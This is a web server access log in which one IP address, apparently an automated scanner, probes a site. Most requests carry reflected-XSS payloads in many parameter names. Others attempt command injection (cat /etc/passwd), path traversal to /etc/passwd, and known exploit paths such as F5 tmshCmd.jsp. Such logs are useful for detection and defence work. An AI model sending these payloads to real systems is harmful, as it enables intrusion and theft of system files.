195.164.49.69 - - [18/Nov/2024:21:18:53 +0000] GET /?activated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activated%27%29%3E&trigger=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trigger%27%29%3E&loggedout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-loggedout%27%29%3E&script=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-script%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-query%27%29%3E&file_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file_name%27%29%3E&fname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fname%27%29%3E&options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-options%27%29%3E&export=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-export%27%29%3E&post=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-p%27%29%3E&action2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action2%27%29%3E&c=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-c%27%29%3E&destination=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-destination%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:53 +0000] GET /?rememberme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rememberme%27%29%3E&module=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-module%27%29%3E&comment_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_ID%27%29%3E&client_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-client_id%27%29%3E&noheader=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noheader%27%29%3E&del=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-del%27%29%3E&media=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-media%27%29%3E&user_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_name%27%29%3E&country=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-country%27%29%3E&phone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-phone%27%29%3E&sidebar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sidebar%27%29%3E&version=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-version%27%29%3E&widget_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget_id%27%29%3E&class=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-class%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:53 +0000] GET /?title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-title%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-view%27%29%3E&context=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-context%27%29%3E&passwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-passwd%27%29%3E&count=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-count%27%29%3E&delete=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete%27%29%3E&test=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-test%27%29%3E&hash=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hash%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-csrf_token%27%29%3E&o=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-o%27%29%3E&activate=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activate%27%29%3E&edit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit%27%29%3E&ip=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ip%27%29%3E&r=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-r%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:53 +0000] GET /?redirect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect%27%29%3E&linkcheck=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-linkcheck%27%29%3E&port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-port%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-password%27%29%3E&target=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-target%27%29%3E&method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-method%27%29%3E¬e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-note%27%29%3E&amount=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-amount%27%29%3E&set=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-set%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-q%27%29%3E&select=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-select%27%29%3E&cid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cid%27%29%3E&tag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keyword%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:53 +0000] GET /?i=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-i%27%29%3E&database=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-database%27%29%3E&tax_input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax_input%27%29%3E&secret=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-secret%27%29%3E&mod=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mod%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-s%27%29%3E&stage=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stage%27%29%3E&time=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-time%27%29%3E&new=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-api_key%27%29%3E&invalid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-invalid%27%29%3E&db=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db%27%29%3E&upload=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-upload%27%29%3E&tablename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tablename%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:54 +0000] GET /?next=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-next%27%29%3E&preview=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview%27%29%3E&shortcode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-shortcode%27%29%3E&features=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-features%27%29%3E&mode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mode%27%29%3E&out_trade_no=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-out_trade_no%27%29%3E&category=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category%27%29%3E&replytocom=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-replytocom%27%29%3E&from=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-from%27%29%3E&start=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start%27%29%3E&value=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-value%27%29%3E&range=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-range%27%29%3E&table=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-table%27%29%3E&limit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-limit%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:54 +0000] GET /?callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-callback%27%29%3E&weblog_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-weblog_title%27%29%3E&check=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-check%27%29%3E&overwrite=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-overwrite%27%29%3E&prefix=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-prefix%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-l%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-token%27%29%3E&start_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start_date%27%29%3E&direction=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-direction%27%29%3E&ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ID%27%29%3E&pid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pid%27%29%3E&to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-to%27%29%3E&checkemail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checkemail%27%29%3E&menu-locations=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-locations%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:54 +0000] GET /?name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-name%27%29%3E&json=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-json%27%29%3E&id_base=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id_base%27%29%3E&where=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-where%27%29%3E&request=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-request%27%29%3E¬es=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-notes%27%29%3E&img=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-img%27%29%3E&a=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-a%27%29%3E&menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-item%27%29%3E&xml=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-xml%27%29%3E&columns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-columns%27%29%3E&service=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-service%27%29%3E&site_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site_id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:54 +0000] GET /?tags=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tags%27%29%3E&e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-e%27%29%3E&users=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-users%27%29%3E&format=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-format%27%29%3E&dl=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dl%27%29%3E&position=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-position%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-url%27%29%3E&theme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-theme%27%29%3E&firstname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-firstname%27%29%3E&fields=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fields%27%29%3E&form=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-form%27%29%3E&level=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-level%27%29%3E&month=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-month%27%29%3E&oauth_verifier=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_verifier%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:54 +0000] GET /?order_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order_id%27%29%3E&cookie=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cookie%27%29%3E&debug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-debug%27%29%3E&m=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-m%27%29%3E&dir=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dir%27%29%3E&new_role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new_role%27%29%3E&trashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trashed%27%29%3E&log=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-log%27%29%3E&excerpt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-excerpt%27%29%3E&settings-updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings-updated%27%29%3E&plugins=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugins%27%29%3E&modify=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-modify%27%29%3E&pwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pwd%27%29%3E&file=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:56 +0000] GET /?u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u%27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups%27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for%27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type%27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc%27%29%3E&newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent%27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo%27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message%27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d%27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width%27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer%27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status%27%29%3E&author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:56 +0000] GET /?tab=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tab%27%29%3E&domain=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-domain%27%29%3E&show=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show%27%29%3E&submit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-submit%27%29%3E&move=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-move%27%29%3E&userid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-userid%27%29%3E&oitar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oitar%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-key%27%29%3E&description=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-description%27%29%3E&user=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user%27%29%3E&active=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-active%27%29%3E&clone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-clone%27%29%3E&success=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-success%27%29%3E&slug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-slug%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:56 +0000] GET /?subject=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-subject%27%29%3E&sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sticky%27%29%3E&ns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ns%27%29%3E&history=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-history%27%29%3E&category_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category_id%27%29%3E&metakeyselect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyselect%27%29%3E©=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-copy%27%29%3E&product_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-product_id%27%29%3E&status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-status%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cat%27%29%3E&list=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-list%27%29%3E&val=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-val%27%29%3E&what=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-what%27%29%3E&group_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group_id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:56 +0000] GET /?attachment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment%27%29%3E&dbname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dbname%27%29%3E&rows=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rows%27%29%3E&parent_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent_id%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lang%27%29%3E&fid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fid%27%29%3E&text=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text%27%29%3E&link=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link%27%29%3E&timeout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timeout%27%29%3E&db_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_name%27%29%3E&ids=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ids%27%29%3E&w=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-w%27%29%3E&provider=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-provider%27%29%3E&plugin_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin_status%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:56 +0000] GET /?sort=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sort%27%29%3E&msg=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-msg%27%29%3E&hostname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hostname%27%29%3E&directory=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-directory%27%29%3E&disabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-disabled%27%29%3E&last_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-last_name%27%29%3E&oauth_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_token%27%29%3E&first_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-first_name%27%29%3E&delete_widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete_widget%27%29%3E&md5=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-md5%27%29%3E&selection=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-selection%27%29%3E&filename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filename%27%29%3E&address=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-address%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:56 +0000] GET /?ajax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ajax%27%29%3E&timezone_string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone_string%27%29%3E&group=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group%27%29%3E&update=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-update%27%29%3E&revision=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-revision%27%29%3E&referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-referer%27%29%3E&index=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-index%27%29%3E&src=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-src%27%29%3E&end_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end_date%27%29%3E&gmt_offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gmt_offset%27%29%3E¶ms=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-params%27%29%3E&html=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-html%27%29%3E&pass=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass%27%29%3E&offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-offset%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:56 +0000] GET /?image=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-image%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id%27%29%3E&order=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order%27%29%3E&sid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sid%27%29%3E&language=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-language%27%29%3E&filter=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filter%27%29%3E&import=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-import%27%29%3E&st=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-st%27%29%3E&act=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-act%27%29%3E&object=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-object%27%29%3E&insert=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-insert%27%29%3E&task=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-task%27%29%3E&dismiss=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dismiss%27%29%3E&orderby=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-orderby%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:56 +0000] GET /?up=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-up%27%29%3E&body=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-body%27%29%3E&return=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-return%27%29%3E&end=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end%27%29%3E&n=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-n%27%29%3E&opt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-opt%27%29%3E&source=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-source%27%29%3E&y=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-y%27%29%3E&parent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent%27%29%3E&reason=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reason%27%29%3E&meta=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-meta%27%29%3E&pass1=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass1%27%29%3E&blog=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog%27%29%3E&plugin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:56 +0000] GET /?option=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-option%27%29%3E&server=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-server%27%29%3E&admin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin%27%29%3E&create=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-create%27%29%3E&template=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-template%27%29%3E&number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-number%27%29%3E&lastname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lastname%27%29%3E&multi_number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-multi_number%27%29%3E&size=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-size%27%29%3E&tax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax%27%29%3E&sql=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sql%27%29%3E&show_sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show_sticky%27%29%3E&attachments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachments%27%29%3E&_method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_method%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:56 +0000] GET /?taxonomy=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-taxonomy%27%29%3E&tables=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tables%27%29%3E&confirm=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-confirm%27%29%3E&db_port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_port%27%29%3E&op=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-op%27%29%3E&untrashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-untrashed%27%29%3E&tid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tid%27%29%3E&flag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-flag%27%29%3E&stylesheet=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stylesheet%27%29%3E&download=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-download%27%29%3E&comment_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_status%27%29%3E&_wpnonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wpnonce%27%29%3E&metakeyinput=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyinput%27%29%3E&remove=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-remove%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:56 +0000] GET /?deleted=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-deleted%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-search%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action%27%29%3E&newname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newname%27%29%3E&info=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-info%27%29%3E&content=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-content%27%29%3E&signature=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signature%27%29%3E&noconfirmation=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noconfirmation%27%29%3E&field=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field%27%29%3E&output=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-output%27%29%3E&city=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-city%27%29%3E&rename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rename%27%29%3E&mail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mail%27%29%3E&term=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-term%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:19:10 +0000] GET /wp-content/plugins/give/readme.txt HTTP/1.1 404 1120
127.0.0.1 - - [18/Nov/2024:21:19:11 +0000] GET /server-status HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:21:19:13 +0000] POST /setup/setupadministrator.action HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:21:19:14 +0000] GET /dump HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:21:19:15 +0000] GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:19:16 +0000] GET /zabbix/setup.php HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:19:17 +0000] GET /public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:19:19 +0000] GET /_profiler/phpinfo?+--env=dev HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:19:49 +0000] POST /Token HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:21:19:50 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:21:19:50 +0000] GET /web.config.i18n.ashx?l=ijbru&v=ijbru HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:19:52 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:19:52 +0000] POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1 404 1139
195.164.49.69 - - [18/Nov/2024:21:19:54 +0000] GET /NON_EXISTING_PATH/ HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:21:19:55 +0000] GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:19:56 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:19:57 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:21:19:59 +0000] GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/E7LY.css HTTP/1.1 404 1178
